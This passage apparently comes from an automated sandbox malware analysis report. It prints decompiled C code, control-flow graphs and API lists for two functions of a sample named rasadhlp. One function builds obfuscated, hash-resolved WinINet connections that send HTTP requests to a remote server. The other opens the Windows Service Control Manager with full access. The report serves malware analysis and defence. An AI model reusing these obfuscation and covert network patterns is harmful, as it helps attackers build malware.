                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoNativeSystem
                                                                                • String ID:
                                                                                • API String ID: 1721193555-0
                                                                                • Opcode ID: 1bd484f0da409f63f769de90087a6badcbb9dcaaa1905a7171d176d3a87f5776
                                                                                • Instruction ID: 00ecdf4fd97bae0a0315e96f6d572603ed00bb1263aaefdfa1addc1a662d8250
                                                                                • Opcode Fuzzy Hash: 1bd484f0da409f63f769de90087a6badcbb9dcaaa1905a7171d176d3a87f5776
                                                                                • Instruction Fuzzy Hash: 6A214830A04630878A2BF66EBCC127AB1D91B94385F91161BF94ADB260EA38CF4147C3
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00322BE0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 293networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 26 322be0-322c16 27 322c1a-322c1e 26->27 28 322c20-322c26 27->28 29 322e60-322e66 28->29 30 322c2c 28->30 31 322f34-322f3a 29->31 32 322e6c 29->32 33 322c32-322c38 30->33 34 322e56-322e5b 30->34 37 322f79-322f7b 31->37 38 322f3c-322f42 31->38 35 322e72-322e78 32->35 36 322f0d-322f13 call 322980 32->36 39 322d1a-322d20 33->39 40 322c3e 33->40 34->28 45 322e7a-322e80 35->45 46 322edc-322ee3 35->46 58 322f18-322f26 36->58 43 322f85-322f87 37->43 44 322f7d-322f83 37->44 48 322ca2-322ca8 38->48 49 322f48-322f4f 38->49 41 322d22-322d28 39->41 42 322d9e-322dad 39->42 50 322c44-322c4a 40->50 51 322fcf-322fd6 40->51 41->48 52 322d2e-322d30 41->52 53 322dca-322dd5 42->53 54 322daf-322dc5 call 323f00 call 323e60 42->54 55 322f89-322f90 43->55 44->55 45->48 57 322e86-322e8d 45->57 63 322f00-322f08 InternetCloseHandle 46->63 64 322ee5-322efb call 323f00 call 323e60 46->64 48->28 56 322cae-322cb9 48->56 59 322f51-322f67 call 323f00 call 323e60 49->59 60 322f6c-322f74 49->60 61 322cba-322cc9 50->61 62 322c4c-322c52 50->62 65 322ff3-323004 51->65 66 322fd8-322fee call 323f00 call 323e60 51->66 76 322d32-322d42 call 3234c0 52->76 77 322d44 52->77 100 322df2-322e00 53->100 101 322dd7-322ded call 323f00 call 323e60 53->101 54->53 68 322f92-322fa8 call 323f00 call 323e60 55->68 69 322fad-322fca HttpSendRequestW 55->69 70 322eaa-322ed7 InternetConnectW 57->70 71 322e8f-322ea5 call 323f00 call 323e60 57->71 78 322f2a-322f2f 58->78 59->60 60->28 72 322ce6-322cfc 61->72 73 322ccb-322ce1 call 323f00 call 323e60 61->73 62->48 80 322c54-322c5b 62->80 63->28 64->63 66->65 68->69 69->27 70->28 71->70 72->78 115 322d02-322d0a 72->115 73->72 91 322d48-322d4f 76->91 77->91 78->28 93 322c78-322c9d InternetOpenW call 324220 80->93 94 322c5d-322c73 call 323f00 call 323e60 80->94 106 322d51-322d67 call 323f00 call 323e60 91->106 107 322d6c-322d99 call 323460 91->107 93->48 94->93 131 322e02-322e09 100->131 132 322e4c-322e51 100->132 101->100 106->107 107->28 115->78 125 322d10-322d15 115->125 125->28 138 322e26-322e32 ObtainUserAgentString 131->138 139 322e0b-322e21 call 323f00 call 323e60 131->139 132->28 142 322e34-322e41 call 3256f0 138->142 143 322e45-322e47 call 324220 138->143 139->138 142->143 143->132
                                                                                C-Code - Quality: 76%
                                                                                			E00322BE0(WCHAR* __ecx, short __edx, long _a4, WCHAR* _a8, void* _a12, intOrPtr _a16) {
				WCHAR* _v4;
				short _v8;
				char _v12;
				char _v16;
				void* _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				void* _v32;
				WCHAR* _v36;
				void* _v40;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __ebp;
				signed int _t37;
				void* _t38;
				void* _t40;
				void* _t43;
				void* _t48;
				void* _t52;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t65;
				void* _t76;
				void* _t77;
				intOrPtr _t79;
				void* _t85;
				void* _t114;
				void* _t133;
				void* _t134;
				void* _t135;
				long _t136;
				void* _t141;
				void* _t142;
				WCHAR* _t143;
				void* _t146;
				void** _t147;
				void* _t150;
				void* _t151;

				_t147 =  &_v40;
				_t146 = _a12;
				_v4 = __ecx;
				_t135 = 0x312c4ad9;
				_t85 = _v4;
				_v8 = __edx;
				_v36 = 0;
				_v24 = 0;
				_v28 = 0;
				_v40 = 0;
				while(1) {
					L1:
					_t133 = _v20;
					goto L2;
					do {
						while(1) {
							L2:
							_t150 = _t135 - 0x312c4ad9;
							if(_t150 > 0) {
								goto L38;
							}
							L3:
							if(_t150 == 0) {
								_t135 = 0x22ee02e8;
								continue;
							} else {
								_t151 = _t135 - 0x1714460e;
								if(_t151 > 0) {
									__eflags = _t135 - 0x22ee02e8;
									if(_t135 == 0x22ee02e8) {
										_t38 =  *0x32e494;
										_v24 = 0x200;
										__eflags = _t38;
										if(_t38 == 0) {
											_t38 = E00323E60(_t85, E00323F00(0x9bab0b12), 0x7facde30, _t146);
											 *0x32e494 = _t38;
										}
										_t141 =  *_t38();
										_t40 =  *0x32dd18;
										__eflags = _t40;
										if(_t40 == 0) {
											_t40 = E00323E60(_t85, E00323F00(0x9bab0b12), 0x9ff0609c, _t146);
											 *0x32dd18 = _t40;
										}
										_t142 =  *_t40(_t141, 8, 0x200);
										__eflags = _t142;
										if(_t142 != 0) {
											_t76 =  *0x32e2fc; // 0x762f49e0
											__eflags = _t76;
											if(_t76 == 0) {
												_t76 = E00323E60(_t85, E00323F00(0x705b7853), 0xa7b8a7b3, _t146);
												 *0x32e2fc = _t76;
											}
											_t77 =  *_t76(0, _t142,  &_v36); // executed
											__eflags = _t77;
											if(_t77 == 0) {
												_t79 = E003256F0(_t142, _t146);
												_t147 = _t147 - 8 + 8;
												_v60 = _t79;
											}
											E00324220(_t85, _t142);
										}
										_t135 = 0x3804105;
										continue;
									} else {
										__eflags = _t135 - 0x2bddac0a;
										if(_t135 != 0x2bddac0a) {
											break;
										} else {
											__eflags = _t146;
											if(_t146 == 0) {
												_t143 = _v28;
											} else {
												_t143 = E003234C0(0x32d210);
												_v28 = _t143;
											}
											_t43 =  *0x32dd88;
											__eflags = _t43;
											if(_t43 == 0) {
												_t43 = E00323E60(_t85, E00323F00(0xb37bd66), 0xb7e598cf, _t146);
												 *0x32dd88 = _t43;
											}
											_t85 =  *_t43(_t133, _t143, _a4, 0, 0, 0, 0x844cc300, 0);
											E00323460(_t143);
											__eflags = _t85;
											_t135 =  !=  ? 0x399ad3d8 : 0x3b13624a;
											continue;
										}
									}
								} else {
									if(_t151 == 0) {
										_t48 =  *0x32e258;
										__eflags = _t48;
										if(_t48 == 0) {
											_t48 = E00323E60(_t85, E00323F00(0xb37bd66), 0x1fa1918a, _t146);
											 *0x32e258 = _t48;
										}
										 *_t48(_v32);
										return _v44;
									} else {
										if(_t135 == 0x161d514) {
											_t52 =  *0x32e1e8;
											_v16 = 4;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E00323E60(_t85, E00323F00(0xb37bd66), 0x30c1111c, _t146);
												 *0x32e1e8 = _t52;
											}
											_t53 =  *_t52(_t85, 0x20000013,  &_v12,  &_v16, 0);
											__eflags = _t53;
											if(_t53 == 0) {
												L49:
												_t135 = 0x31d265c4;
											} else {
												__eflags = _v32 - 0xc8;
												if(_v32 != 0xc8) {
													goto L49;
												} else {
													_t135 = 0x3733f1d1;
													while(1) {
														L2:
														_t150 = _t135 - 0x312c4ad9;
														if(_t150 > 0) {
															goto L38;
														}
														goto L3;
													}
													goto L38;
												}
											}
											continue;
										} else {
											if(_t135 == 0x3804105) {
												if( *0x32dcdc == 0) {
													 *0x32dcdc = E00323E60(_t85, E00323F00(0xb37bd66), 0xb1cc2959, _t146);
												}
												_t55 = InternetOpenW(_v36, 0, 0, 0, 0); // executed
												_v52 = _t55;
												_t135 =  !=  ? 0x34cdf7bf : 0x290e05a1;
												E00324220(_t85, _v56);
											}
											break;
										}
									}
								}
							}
							L64:
							L38:
							__eflags = _t135 - 0x3733f1d1;
							if(__eflags > 0) {
								__eflags = _t135 - 0x399ad3d8;
								if(_t135 == 0x399ad3d8) {
									__eflags = _t146;
									if(_t146 == 0) {
										_t136 = 0;
										_t134 = 0;
										__eflags = 0;
									} else {
										_t136 = _a4;
										_t134 =  *_t146;
									}
									__eflags =  *0x32dcb8;
									if( *0x32dcb8 == 0) {
										 *0x32dcb8 = E00323E60(_t85, E00323F00(0xb37bd66), 0x6efcb66d, _t146);
									}
									_t37 = HttpSendRequestW(_t85, _a8, 0xffffffff, _t134, _t136); // executed
									asm("sbb esi, esi");
									_t135 = ( ~_t37 & 0xcf8f6f50) + 0x31d265c4;
									goto L1;
								} else {
									__eflags = _t135 - 0x3b13624a;
									if(_t135 != 0x3b13624a) {
										break;
									} else {
										_t58 =  *0x32e258;
										__eflags = _t58;
										if(_t58 == 0) {
											_t58 = E00323E60(_t85, E00323F00(0xb37bd66), 0x1fa1918a, _t146);
											 *0x32e258 = _t58;
										}
										 *_t58(_t133);
										_t135 = 0x1714460e;
										continue;
									}
								}
							} else {
								if(__eflags == 0) {
									__eflags = E00322980(_t85, _a16);
									_t114 =  !=  ? 1 : _v40;
									__eflags = _t114;
									_v40 = _t114;
									goto L49;
								} else {
									__eflags = _t135 - 0x31d265c4;
									if(_t135 == 0x31d265c4) {
										__eflags =  *0x32e258;
										if( *0x32e258 == 0) {
											 *0x32e258 = E00323E60(_t85, E00323F00(0xb37bd66), 0x1fa1918a, _t146);
										}
										InternetCloseHandle(_t85); // executed
										_t135 = 0x3b13624a;
										continue;
									} else {
										__eflags = _t135 - 0x34cdf7bf;
										if(_t135 != 0x34cdf7bf) {
											break;
										} else {
											__eflags =  *0x32dfd0;
											if( *0x32dfd0 == 0) {
												 *0x32dfd0 = E00323E60(_t85, E00323F00(0xb37bd66), 0x3e17dfbb, _t146);
											}
											_t65 = InternetConnectW(_v32, _v4, _v8, 0, 0, 3, 0, 0); // executed
											_t133 = _t65;
											__eflags = _t133;
											_v52 = _t133;
											_t135 =  !=  ? 0x2bddac0a : 0x1714460e;
											continue;
										}
									}
								}
							}
							goto L64;
						}
					} while (_t135 != 0x290e05a1);
					return _v40;
					goto L64;
				}
			}













































                                                                                0x00322be0
                                                                                0x00322be5
                                                                                0x00322bec
                                                                                0x00322bf0
                                                                                0x00322bf5
                                                                                0x00322bfa
                                                                                0x00322bfe
                                                                                0x00322c06
                                                                                0x00322c0e
                                                                                0x00322c16
                                                                                0x00322c1a
                                                                                0x00322c1a
                                                                                0x00322c1a
                                                                                0x00322c1a
                                                                                0x00322c20
                                                                                0x00322c20
                                                                                0x00322c20
                                                                                0x00322c20
                                                                                0x00322c26
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00322c2c
                                                                                0x00322c2c
                                                                                0x00322e56
                                                                                0x00000000
                                                                                0x00322c32
                                                                                0x00322c32
                                                                                0x00322c38
                                                                                0x00322d1a
                                                                                0x00322d20
                                                                                0x00322d9e
                                                                                0x00322da3
                                                                                0x00322dab
                                                                                0x00322dad
                                                                                0x00322dc0
                                                                                0x00322dc5
                                                                                0x00322dc5
                                                                                0x00322dcc
                                                                                0x00322dce
                                                                                0x00322dd3
                                                                                0x00322dd5
                                                                                0x00322de8
                                                                                0x00322ded
                                                                                0x00322ded
                                                                                0x00322dfc
                                                                                0x00322dfe
                                                                                0x00322e00
                                                                                0x00322e02
                                                                                0x00322e07
                                                                                0x00322e09
                                                                                0x00322e1c
                                                                                0x00322e21
                                                                                0x00322e21
                                                                                0x00322e2e
                                                                                0x00322e30
                                                                                0x00322e32
                                                                                0x00322e39
                                                                                0x00322e3e
                                                                                0x00322e41
                                                                                0x00322e41
                                                                                0x00322e47
                                                                                0x00322e47
                                                                                0x00322e4c
                                                                                0x00000000
                                                                                0x00322d22
                                                                                0x00322d22
                                                                                0x00322d28
                                                                                0x00000000
                                                                                0x00322d2e
                                                                                0x00322d2e
                                                                                0x00322d30
                                                                                0x00322d44
                                                                                0x00322d32
                                                                                0x00322d3c
                                                                                0x00322d3e
                                                                                0x00322d3e
                                                                                0x00322d48
                                                                                0x00322d4d
                                                                                0x00322d4f
                                                                                0x00322d62
                                                                                0x00322d67
                                                                                0x00322d67
                                                                                0x00322d83
                                                                                0x00322d85
                                                                                0x00322d8a
                                                                                0x00322d96
                                                                                0x00000000
                                                                                0x00322d96
                                                                                0x00322d28
                                                                                0x00322c3e
                                                                                0x00322c3e
                                                                                0x00322fcf
                                                                                0x00322fd4
                                                                                0x00322fd6
                                                                                0x00322fe9
                                                                                0x00322fee
                                                                                0x00322fee
                                                                                0x00322ff7
                                                                                0x00323004
                                                                                0x00322c44
                                                                                0x00322c4a
                                                                                0x00322cba
                                                                                0x00322cbf
                                                                                0x00322cc7
                                                                                0x00322cc9
                                                                                0x00322cdc
                                                                                0x00322ce1
                                                                                0x00322ce1
                                                                                0x00322cf8
                                                                                0x00322cfa
                                                                                0x00322cfc
                                                                                0x00322f2a
                                                                                0x00322f2a
                                                                                0x00322d02
                                                                                0x00322d02
                                                                                0x00322d0a
                                                                                0x00000000
                                                                                0x00322d10
                                                                                0x00322d10
                                                                                0x00322c20
                                                                                0x00322c20
                                                                                0x00322c20
                                                                                0x00322c26
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00322c26
                                                                                0x00000000
                                                                                0x00322c20
                                                                                0x00322d0a
                                                                                0x00000000
                                                                                0x00322c4c
                                                                                0x00322c52
                                                                                0x00322c5b
                                                                                0x00322c73
                                                                                0x00322c73
                                                                                0x00322c84
                                                                                0x00322c8c
                                                                                0x00322c9a
                                                                                0x00322c9d
                                                                                0x00322c9d
                                                                                0x00000000
                                                                                0x00322c52
                                                                                0x00322c4a
                                                                                0x00322c3e
                                                                                0x00322c38
                                                                                0x00000000
                                                                                0x00322e60
                                                                                0x00322e60
                                                                                0x00322e66
                                                                                0x00322f34
                                                                                0x00322f3a
                                                                                0x00322f79
                                                                                0x00322f7b
                                                                                0x00322f85
                                                                                0x00322f87
                                                                                0x00322f87
                                                                                0x00322f7d
                                                                                0x00322f7d
                                                                                0x00322f80
                                                                                0x00322f80
                                                                                0x00322f8e
                                                                                0x00322f90
                                                                                0x00322fa8
                                                                                0x00322fa8
                                                                                0x00322fb6
                                                                                0x00322fbc
                                                                                0x00322fc4
                                                                                0x00000000
                                                                                0x00322f3c
                                                                                0x00322f3c
                                                                                0x00322f42
                                                                                0x00000000
                                                                                0x00322f48
                                                                                0x00322f48
                                                                                0x00322f4d
                                                                                0x00322f4f
                                                                                0x00322f62
                                                                                0x00322f67
                                                                                0x00322f67
                                                                                0x00322f6d
                                                                                0x00322f6f
                                                                                0x00000000
                                                                                0x00322f6f
                                                                                0x00322f42
                                                                                0x00322e6c
                                                                                0x00322e6c
                                                                                0x00322f1c
                                                                                0x00322f23
                                                                                0x00322f23
                                                                                0x00322f26
                                                                                0x00000000
                                                                                0x00322e72
                                                                                0x00322e72
                                                                                0x00322e78
                                                                                0x00322ee1
                                                                                0x00322ee3
                                                                                0x00322efb
                                                                                0x00322efb
                                                                                0x00322f01
                                                                                0x00322f03
                                                                                0x00000000
                                                                                0x00322e7a
                                                                                0x00322e7a
                                                                                0x00322e80
                                                                                0x00000000
                                                                                0x00322e86
                                                                                0x00322e8b
                                                                                0x00322e8d
                                                                                0x00322ea5
                                                                                0x00322ea5
                                                                                0x00322ec0
                                                                                0x00322ec2
                                                                                0x00322ec9
                                                                                0x00322ecb
                                                                                0x00322ed4
                                                                                0x00000000
                                                                                0x00322ed4
                                                                                0x00322e80
                                                                                0x00322e78
                                                                                0x00322e6c
                                                                                0x00000000
                                                                                0x00322e66
                                                                                0x00322ca2
                                                                                0x00322cb9
                                                                                0x00000000
                                                                                0x00322cb9

                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00322C84
                                                                                • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 00322E2E
                                                                                • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00322EC0
                                                                                • InternetCloseHandle.WININET(?), ref: 00322F01
                                                                                • HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 00322FB6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                                                                • String ID: Sx[p$I/v
                                                                                • API String ID: 1741791824-1179412207
                                                                                • Opcode ID: fddd98444db4fb9084fc9e6822669d45dd5da2dc581781518f36c64f290d7e46
                                                                                • Instruction ID: c794a747093642ff2d176fc159567e415c142f748a748ce5ce4eeecd0c999ce9
                                                                                • Opcode Fuzzy Hash: fddd98444db4fb9084fc9e6822669d45dd5da2dc581781518f36c64f290d7e46
                                                                                • Instruction Fuzzy Hash: C9A12431B44331BBDB26AF68BC41B2F72E9AB84750F12091DF951EB364EA74DD018B81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00329860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 150 329860-329878 151 329880-329885 150->151 152 3299e2-3299e7 151->152 153 32988b 151->153 154 329ae3-329ae8 152->154 155 3299ed 152->155 156 329891-329896 153->156 157 32998e-329995 153->157 160 329b02-329b09 154->160 161 329aea-329aef 154->161 162 329a73-329a7a 155->162 163 3299f3-3299f8 155->163 158 329936-32993b 156->158 159 32989c 156->159 164 3299b2-3299c1 OpenSCManagerW 157->164 165 329997-3299ad call 323f00 call 323e60 157->165 158->161 172 329941-329949 158->172 168 3298a2-3298a7 159->168 169 329927-329931 call 327c60 159->169 174 329b26-329b44 SHGetFolderPathW call 323040 160->174 175 329b0b-329b21 call 323f00 call 323e60 160->175 161->151 173 329af5-329b01 161->173 166 329a97-329aa2 162->166 167 329a7c-329a92 call 323f00 call 323e60 162->167 176 329a42-329a49 163->176 177 3299fa-3299ff 163->177 170 3299c3-3299d3 164->170 171 3299d8-3299dd 164->171 165->164 207 329aa4-329aba call 323f00 call 323e60 166->207 208 329abf-329ad0 166->208 167->166 179 329905-329922 168->179 180 3298a9-3298ae 168->180 169->151 170->151 171->151 188 32994b-329963 call 323f00 call 323e60 172->188 189 329969-329989 SHGetFolderPathW 172->189 194 329b49 174->194 175->174 183 329a66-329a6e CloseServiceHandle 176->183 184 329a4b-329a61 call 323f00 call 323e60 176->184 177->161 182 329a05-329a3d 177->182 179->151 180->161 191 3298b4-3298bb 180->191 182->151 183->151 184->183 188->189 189->151 200 3298d8-329900 call 323d00 191->200 201 3298bd-3298d3 call 323f00 call 323e60 191->201 204 329b4c-329b58 194->204 200->151 201->200 207->208 208->204 222 329ad2-329ade 208->222 222->151
                                                                                C-Code - Quality: 73%
                                                                                			E00329860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x32e310;
							if( *0x32e310 == 0) {
								 *0x32e310 = E00323E60(_t64, E00323F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x32e54c; // 0x54e6d0
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x32dbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E00323E60(_t64, E00323F00(0xd9518805), 0x141622d6, _t94);
										 *0x32dbd8 = _t69;
									}
									_t53 =  *0x32e54c; // 0x54e6d0
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E00327C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x32e3f4;
											if(_t60 == 0) {
												_t60 = E00323E60(_t64, E00323F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x32e3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E00323D00( &_v536);
											_t72 =  *0x32e54c; // 0x54e6d0
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x32dbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E00323E60(_t64, E00323F00(0xd9518805), 0x141622d6, _t94);
								 *0x32dbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x32e54c; // 0x54e6d0
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E00323040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x32e494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E00323E60(_t64, E00323F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x32e494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x32dd18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E00323E60(_t64, E00323F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x32dd18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x32e54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E00327E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x32e18c;
								if( *0x32e18c == 0) {
									 *0x32e18c = E00323E60(_t64, E00323F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x32e54c; // 0x54e6d0
									 *((intOrPtr*)(_t47 + 8)) = 0x327e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x00329868
                                                                                0x0032986a
                                                                                0x00329871
                                                                                0x00329875
                                                                                0x00329875
                                                                                0x00329878
                                                                                0x00329880
                                                                                0x00329880
                                                                                0x00329880
                                                                                0x00329880
                                                                                0x00329885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0032988b
                                                                                0x00329993
                                                                                0x00329995
                                                                                0x003299ad
                                                                                0x003299ad
                                                                                0x003299bb
                                                                                0x003299bd
                                                                                0x003299bf
                                                                                0x003299c1
                                                                                0x003299d8
                                                                                0x003299c3
                                                                                0x003299c3
                                                                                0x003299c8
                                                                                0x003299ce
                                                                                0x003299ce
                                                                                0x00000000
                                                                                0x00329891
                                                                                0x00329891
                                                                                0x00329896
                                                                                0x00329936
                                                                                0x0032993b
                                                                                0x00000000
                                                                                0x00329941
                                                                                0x00329941
                                                                                0x00329947
                                                                                0x00329949
                                                                                0x00329961
                                                                                0x00329963
                                                                                0x00329963
                                                                                0x00329969
                                                                                0x0032997d
                                                                                0x0032997f
                                                                                0x00329981
                                                                                0x00329986
                                                                                0x00000000
                                                                                0x00329986
                                                                                0x0032989c
                                                                                0x0032989c
                                                                                0x00329927
                                                                                0x0032992c
                                                                                0x00000000
                                                                                0x003298a2
                                                                                0x003298a7
                                                                                0x00329905
                                                                                0x0032990d
                                                                                0x00329912
                                                                                0x0032991a
                                                                                0x00000000
                                                                                0x003298a9
                                                                                0x003298ae
                                                                                0x00000000
                                                                                0x003298b4
                                                                                0x003298b4
                                                                                0x003298bb
                                                                                0x003298ce
                                                                                0x003298d3
                                                                                0x003298d3
                                                                                0x003298e4
                                                                                0x003298ea
                                                                                0x003298ef
                                                                                0x003298f5
                                                                                0x003298fb
                                                                                0x00000000
                                                                                0x003298fb
                                                                                0x003298ae
                                                                                0x003298a7
                                                                                0x0032989c
                                                                                0x00329896
                                                                                0x00000000
                                                                                0x0032988b
                                                                                0x003299e2
                                                                                0x003299e7
                                                                                0x00329ae3
                                                                                0x00329ae8
                                                                                0x00329b02
                                                                                0x00329b07
                                                                                0x00329b09
                                                                                0x00329b1c
                                                                                0x00329b21
                                                                                0x00329b21
                                                                                0x00329b33
                                                                                0x00329b35
                                                                                0x00329b3e
                                                                                0x00329b3e
                                                                                0x00329b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003299ed
                                                                                0x003299ed
                                                                                0x00329a73
                                                                                0x00329a78
                                                                                0x00329a7a
                                                                                0x00329a8d
                                                                                0x00329a92
                                                                                0x00329a92
                                                                                0x00329a99
                                                                                0x00329a9b
                                                                                0x00329aa0
                                                                                0x00329aa2
                                                                                0x00329ab5
                                                                                0x00329aba
                                                                                0x00329aba
                                                                                0x00329ac7
                                                                                0x00329ac9
                                                                                0x00329ace
                                                                                0x00329ad0
                                                                                0x00329b4f
                                                                                0x00329b58
                                                                                0x00329ad2
                                                                                0x00329ad2
                                                                                0x00329ad9
                                                                                0x00000000
                                                                                0x00329ad9
                                                                                0x003299f3
                                                                                0x003299f3
                                                                                0x003299f8
                                                                                0x00329a47
                                                                                0x00329a49
                                                                                0x00329a61
                                                                                0x00329a61
                                                                                0x00329a67
                                                                                0x00329a69
                                                                                0x00000000
                                                                                0x003299fa
                                                                                0x003299fa
                                                                                0x003299ff
                                                                                0x00000000
                                                                                0x00329a05
                                                                                0x00329a05
                                                                                0x00329a0d
                                                                                0x00329a12
                                                                                0x00329a17
                                                                                0x00329a1f
                                                                                0x00329a24
                                                                                0x00329a2c
                                                                                0x00329a31
                                                                                0x00329a38
                                                                                0x00000000
                                                                                0x00329a38
                                                                                0x003299ff
                                                                                0x003299f8
                                                                                0x003299ed
                                                                                0x00000000
                                                                                0x00329aea
                                                                                0x00329aea
                                                                                0x00329aea
                                                                                0x00329b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0054E6B8), ref: 0032997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003299BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 00329A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 00329B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
